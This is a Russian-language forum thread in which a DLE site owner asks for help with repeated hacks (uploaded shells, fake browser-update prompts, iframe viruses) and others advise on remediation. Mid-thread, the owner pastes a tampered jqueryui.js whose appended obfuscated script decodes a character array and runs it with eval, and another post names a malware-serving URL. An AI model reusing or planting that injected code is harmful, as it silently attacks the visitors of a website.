Нужна помощь, ломают сайт, регулярно :(

[kamwork 0]

Сайт pokushay.ru

Уже если честно устал, от службы поддержки к сожалению помощи не получил ни какой, кроме рекомендаций о том, что бы менять пароли, не хранить их на компе и все такое. А так же не использовать сторонние модули.

У меня используется модуль sblock как без него я не знаю, т.к. функционал DLE не дает тех возможностей, которые мне дает данный модуль.

Есть еще самописная штучка, примерно такого код:

<?

if (ereg("^/pervii_bluda/$",$_SERVER['REQUEST_URI']))

echo '<p>.......</p><br />';

?>

лежит в папке modules/context

И вот такая http://www.pokushay.ru/catmap/kartofelnye_garniry.html она из нескольких файлов.

Я готов заплатить, но помогите избавиться от этих постоянных взломов, утомило утро начинать с вычещения шелов и прочих модификаций

[celsoft 6 082]

Начните с описания того что именно у вас ломают и что именно у вас делают на сайте, а не просто сообщение "у меня ломают сайт", опишите подробно и четко что именно у вас делают на сайте, от этого уже зависит что вам делать.

У меня используется модуль sblock как без него я не знаю

На форуме публиковали что у данного модуля есть уязвимости, какие сказать не могу, я сторонние модули не смотрю и не пользуюсь.

[Lomot 134]

И вот такая http://www.pokushay....ye_garniry.html она из нескольких файлов.

По ссылке вирусы с этого адреса http://go-fast.ru/in.cgi?5

[kamwork 0]

Начните с описания того что именно у вас ломают и что именно у вас делают на сайте, а не просто сообщение "у меня ломают сайт", опишите подробно и четко что именно у вас делают на сайте, от этого уже зависит что вам делать.

Ну смотрите, на сайте появляются шелы, они как правило сидят в папке uploads в какой то из подпапок. Т.е. имеется полный доступ к сайту. Дадее уже на что фантазии хватает. Либо под мобильную версию делают сообщение что опера старела скачайте новую. Либо просто вирус в инфрейме. Либо параллельно с сайтом, открывается еще 1 сайт.

Я пробовал с нуля все ставить, не помогло У меня отдельный сервер, на котором под каждый сайт отдельный аккаунт, так что врядли с соседних сайтов заползают.

У меня используется модуль sblock как без него я не знаю

На форуме публиковали что у данного модуля есть уязвимости, какие сказать не могу, я сторонние модули не смотрю и не пользуюсь.

Поискал - не нашел данную тему. А без этого модуля, сайт будет не удобен. Уж очень удобно там все реализовано.

И вот такая http://www.pokushay....ye_garniry.html она из нескольких файлов.

По ссылке вирусы с этого адреса http://go-fast.ru/in.cgi?5

И сейчас что ли вирусы? Проверял, вроде все тихо там у меня

[celsoft 6 082]

Ну смотрите, на сайте появляются шелы, они как правило сидят в папке uploads в какой то из подпапок. Т.е. имеется полный доступ к сайту. Дадее уже на что фантазии хватает. Либо под мобильную версию делают сообщение что опера старела скачайте новую. Либо просто вирус в инфрейме. Либо параллельно с сайтом, открывается еще 1 сайт.

Я правильно понимаю что версия скрипта у вас актуальная? Если да, то вам нужно полностью восстановить оригинальные файлы скрипта, сменить все пароли в админпанели, проверить что нет посторонних администраторов. Сменить пароли на БД и FTP. Не ставить никаких посторонних модулей и посмотреть появится ли что либо или нет. После того как восстановите все оригинальное, дайте доступ по FTP, и к админпанели, чтобы я визуально посмотрел, структуру папок и критически важных файлов, что у вас там не удалены механизмы защиты, возможно шел был ранее добавлен в теже файлы настроек, которые перезаливка дистрибутива не удаляет. Потому что при оригинальной структуре DLE даже если в папке uploads появится шелл его запустить невозможно. Но это исключительно при оригинальной структе и наличии всех необходимых .htaccess в папках. Вообщем нужно визуально все будет осмотреть, но удаление всех посторонних файлов и скриптов обязательно, независимо нужен вам тот или иной сторонний модуль или нет.

[kamwork 0]

Ну смотрите, на сайте появляются шелы, они как правило сидят в папке uploads в какой то из подпапок. Т.е. имеется полный доступ к сайту. Дадее уже на что фантазии хватает. Либо под мобильную версию делают сообщение что опера старела скачайте новую. Либо просто вирус в инфрейме. Либо параллельно с сайтом, открывается еще 1 сайт.

Я правильно понимаю что версия скрипта у вас актуальная? Если да, то вам нужно полностью восстановить оригинальные файлы скрипта, сменить все пароли в админпанели, проверить что нет посторонних администраторов. Сменить пароли на БД и FTP. Не ставить никаких посторонних модулей и посмотреть появится ли что либо или нет. После того как восстановите все оригинальное, дайте доступ по FTP, и к админпанели, чтобы я визуально посмотрел, структуру папок и критически важных файлов, что у вас там не удалены механизмы защиты, возможно шел был ранее добавлен в теже файлы настроек, которые перезаливка дистрибутива не удаляет. Потому что при оригинальной структуре DLE даже если в папке uploads появится шелл его запустить невозможно. Но это исключительно при оригинальной структе и наличии всех необходимых .htaccess в папках. Вообщем нужно визуально все будет осмотреть, но удаление всех посторонних файлов и скриптов обязательно, независимо нужен вам тот или иной сторонний модуль или нет.

это сложно, если я запущу сайт без модуля с-блокс, сайт будет выглядеть ужасненько.. Я могу смириться с тем, что удалю блоки sape и ему подобных на время, но без с-блокс будет сложно

[kamwork 0]

Вчера перезалил весь сайт с нуля. Сегодня утром нашел странный файл - jqueryui.js, он то вроде и есть изначально, но он был модифицирован. При попытке скачки файла - он удаляется с компа сразу. Если изменить разширение, то нет.

Я так полагаю, вот измененная часть:

(function(c){c.effects.slide=function(d){return this.queue(function(){var a=c(this),h=["position","top","bottom","left","right"],f=c.effects.setMode(a,d.options.mode||"show"),b=d.options.direction||"left";c.effects.save(a,h);a.show();c.effects.createWrapper(a).css({overflow:"hidden"});var g=b=="up"||b=="down"?"top":"left";b=b=="up"||b=="left"?"pos":"neg";var e=d.options.distance||(g=="top"?a.outerHeight({margin:true}):a.outerWidth({margin:true}));if(f=="show")a.css(g,b=="pos"?isNaN(e)?"-"+e:-e:e);

var i={};i[g]=(f=="show"?b=="pos"?"+=":"-=":b=="pos"?"-=":"+=")+e;a.animate(i,{queue:false,duration:d.duration,easing:d.options.easing,complete:function(){f=="hide"&&a.hide();c.effects.restore(a,h);c.effects.removeWrapper(a);d.callback&&d.callback.apply(this,arguments);a.dequeue()}})})}})(jQuery);

var s=new String();try{document.asd.asd}catch(q){r=1;c=String;}if(r&&document.createTextNode)u=2;e=eval;m=[4.5*u,18/u,52.5*u,204/u,16*u,80/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,20.5*u,246/u,4.5*u,18/u,4.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,228/u,20*u,82/u,29.5*u,18/u,4.5*u,250/u,16*u,202/u,54*u,230/u,50.5*u,64/u,61.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,238/u,57*u,210/u,58*u,202/u,20*u,68/u,30*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,64/u,57.5*u,228/u,49.5*u,122/u,19.5*u,208/u,58*u,232/u,56*u,116/u,23.5*u,94/u,51.5*u,222/u,22.5*u,204/u,48.5*u,230/u,58*u,92/u,57*u,234/u,23.5*u,210/u,55*u,92/u,49.5*u,206/u,52.5*u,126/u,26.5*u,78/u,16*u,238/u,52.5*u,200/u,58*u,208/u,30.5*u,78/u,24.5*u,96/u,19.5*u,64/u,52*u,202/u,52.5*u,206/u,52*u,232/u,30.5*u,78/u,24.5*u,96/u,19.5*u,64/u,57.5*u,232/u,60.5*u,216/u,50.5*u,122/u,19.5*u,236/u,52.5*u,230/u,52.5*u,196/u,52.5*u,216/u,52.5*u,232/u,60.5*u,116/u,52*u,210/u,50*u,200/u,50.5*u,220/u,29.5*u,224/u,55.5*u,230/u,52.5*u,232/u,52.5*u,222/u,55*u,116/u,48.5*u,196/u,57.5*u,222/u,54*u,234/u,58*u,202/u,29.5*u,216/u,50.5*u,204/u,58*u,116/u,24*u,118/u,58*u,222/u,56*u,116/u,24*u,118/u,19.5*u,124/u,30*u,94/u,52.5*u,204/u,57*u,194/u,54.5*u,202/u,31*u,68/u,20.5*u,118/u,4.5*u,18/u,62.5*u,18/u,4.5*u,204/u,58.5*u,220/u,49.5*u,232/u,52.5*u,222/u,55*u,64/u,52.5*u,204/u,57*u,194/u,54.5*u,202/u,57*u,80/u,20.5*u,246/u,4.5*u,18/u,4.5*u,236/u,48.5*u,228/u,16*u,204/u,16*u,122/u,16*u,200/u,55.5*u,198/u,58.5*u,218/u,50.5*u,220/u,58*u,92/u,49.5*u,228/u,50.5*u,194/u,58*u,202/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,80/u,19.5*u,210/u,51*u,228/u,48.5*u,218/u,50.5*u,78/u,20.5*u,118/u,51*u,92/u,57.5*u,202/u,58*u,130/u,58*u,232/u,57*u,210/u,49*u,234/u,58*u,202/u,20*u,78/u,57.5*u,228/u,49.5*u,78/u,22*u,78/u,52*u,232/u,58*u,224/u,29*u,94/u,23.5*u,206/u,55.5*u,90/u,51*u,194/u,57.5*u,232/u,23*u,228/u,58.5*u,94/u,52.5*u,220/u,23*u,198/u,51.5*u,210/u,31.5*u,106/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,236/u,52.5*u,230/u,52.5*u,196/u,52.5*u,216/u,52.5*u,232/u,60.5*u,122/u,19.5*u,208/u,52.5*u,200/u,50*u,202/u,55*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,224/u,55.5*u,230/u,52.5*u,232/u,52.5*u,222/u,55*u,122/u,19.5*u,194/u,49*u,230/u,55.5*u,216/u,58.5*u,232/u,50.5*u,78/u,29.5*u,204/u,23*u,230/u,58*u,242/u,54*u,202/u,23*u,216/u,50.5*u,204/u,58*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,232/u,60.5*u,216/u,50.5*u,92/u,58*u,222/u,56*u,122/u,19.5*u,96/u,19.5*u,118/u,51*u,92/u,57.5*u,202/u,58*u,130/u,58*u,232/u,57*u,210/u,49*u,234/u,58*u,202/u,20*u,78/u,59.5*u,210/u,50*u,232/u,52*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,204/u,23*u,230/u,50.5*u,232/u,32.5*u,232/u,58*u,228/u,52.5*u,196/u,58.5*u,232/u,50.5*u,80/u,19.5*u,208/u,50.5*u,210/u,51.5*u,208/u,58*u,78/u,22*u,78/u,24.5*u,96/u,19.5*u,82/u,29.5*u,18/u,4.5*u,18/u,50*u,222/u,49.5*u,234/u,54.5*u,202/u,55*u,232/u,23*u,206/u,50.5*u,232/u,34.5*u,216/u,50.5*u,218/u,50.5*u,220/u,58*u,230/u,33*u,242/u,42*u,194/u,51.5*u,156/u,48.5*u,218/u,50.5*u,80/u,19.5*u,196/u,55.5*u,200/u,60.5*u,78/u,20.5*u,182/u,24*u,186/u,23*u,194/u,56*u,224/u,50.5*u,220/u,50*u,134/u,52*u,210/u,54*u,200/u,20*u,204/u,20.5*u,118/u,4.5*u,18/u,62.5*u];with(c)mm=fromCharCode;for(i=0;i!=m.length;i++)s+=mm(e("m"+"["+"i"+']'));try{document.qwe.removeChild({})}catch(q){e(s);};

;

Изменено 27 октября 2011 пользователем kamwork

[celsoft 6 082]

kamwork,

на этот файл нет доступа для записи, соответственно записать его через скрипты и модифицировать нельзя.

Если на файлы не было прав на запись, то изменить их через скрипты или удалить невозможно в принципе, т.к. нет прав. И это мог быть и взлом, но не скрипта DLE, а вашего FTP доступа или root доступа к серверу, или доступа к панели управления хостингом, либо уязвимости непосредственно в серверном ПО. Как воруются доступы и какие меры предпринять вы можете прочитать в темах на форуме

http://forum.dle-new...ndpost&p=175979

http://forum.dle-new...32928&hl=iframe

Там подробно описано как могут вороваться FTP доступы и как от этого защитится. Проверяйте свой компьютер на вирусы, меняйте все пароли, в том числе и по FTP и к БД. Установите ограничение по IP на доступ по FTP. Уведомите своего хостинг провайдера пусть по логам проверять кто и когда заходил по FTP и изменял данные файлы.

В любом случае дайте мне сейчас доступ по FTP и к админпанели, я посмотрю есть права на запись в данный файл, если их нет, то у вас проблема именно с безопасностью не скриптов, а потерей доступа, либо у вас его воруют либо у хостинга.

[prikindel 255]

Я пробовал с нуля все ставить, не помогло У меня отдельный сервер, на котором под каждый сайт отдельный аккаунт, так что врядли с соседних сайтов заползают.

очень спорный момент и зависит напрямую от настроек сервера.

[kamwork 0]

Проблема крылась в настройках сервера. Не работали запреты в .htaccess

Спасибо разработчику s-blocks за помощь

Изменено 3 ноября 2011 пользователем kamwork

[Mr-X 0]

На сервер рекомендую поставить CSF (Firewall)

Установка,

Настройки

[retysy 1]

На сервер рекомендую поставить CSF (Firewall) Установка, Настройки

спасибо, попробую, думаю для безопасности не помешает)